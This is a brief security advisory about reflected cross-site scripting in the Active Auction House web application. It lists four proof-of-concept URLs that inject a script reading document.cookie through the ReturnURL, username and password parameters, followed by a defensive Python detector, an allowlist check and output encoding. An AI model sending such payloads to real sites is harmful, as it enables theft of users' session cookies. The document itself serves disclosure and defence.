Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URIs are available:
http://www.example.com/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
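
The following is an added defensive example, not code from the advisory or the vendor: it flags requests whose `ReturnURL`, `username` or `password` values decode to HTML metacharacters, and shows the allowlist check and attribute encoding that neutralise the values above. The function names, the rule that a valid `ReturnURL` is a site-relative `.asp` page, and the `start.asp` fallback are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Parameters used as injection points in the advisory's proof-of-concept URIs.
REFLECTED_PARAMS = ("ReturnURL", "username", "password")

# Assumption: a legitimate ReturnURL is a site-relative page such as "start.asp".
# The first character must not be "/" so "//host/x.asp" is rejected.
SAFE_RETURN_URL = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_\-/]*\.asp")

# Characters that let a value close a quoted attribute or open a new tag.
HTML_META = re.compile(r"[<>\"']")


def suspicious_params(uri):
    """Names of reflected parameters whose decoded value has HTML metacharacters."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return [
        name for name in REFLECTED_PARAMS
        if any(HTML_META.search(v) for v in query.get(name, []))
    ]


def safe_return_url(value, default="start.asp"):
    """Accept only site-relative .asp targets; otherwise use a fixed page."""
    return value if SAFE_RETURN_URL.fullmatch(value) else default


def encode_for_attribute(value):
    """HTML-encode a value before writing it into a quoted attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    # Request taken from the advisory, followed by a constructed benign one.
    base = "http://www.example.com/activeauctionsuperstore/"
    samples = [
        base + "account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
        base + "?ReturnURL=start.asp&username=dcrab&password=",
    ]
    for uri in samples:
        print(suspicious_params(uri) or "clean", uri)
```

Output encoding at the point of reflection is the fix; the metacharacter check is a log or WAF heuristic for spotting probes like the ones listed.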


 

Copyright 2010, SecurityFocus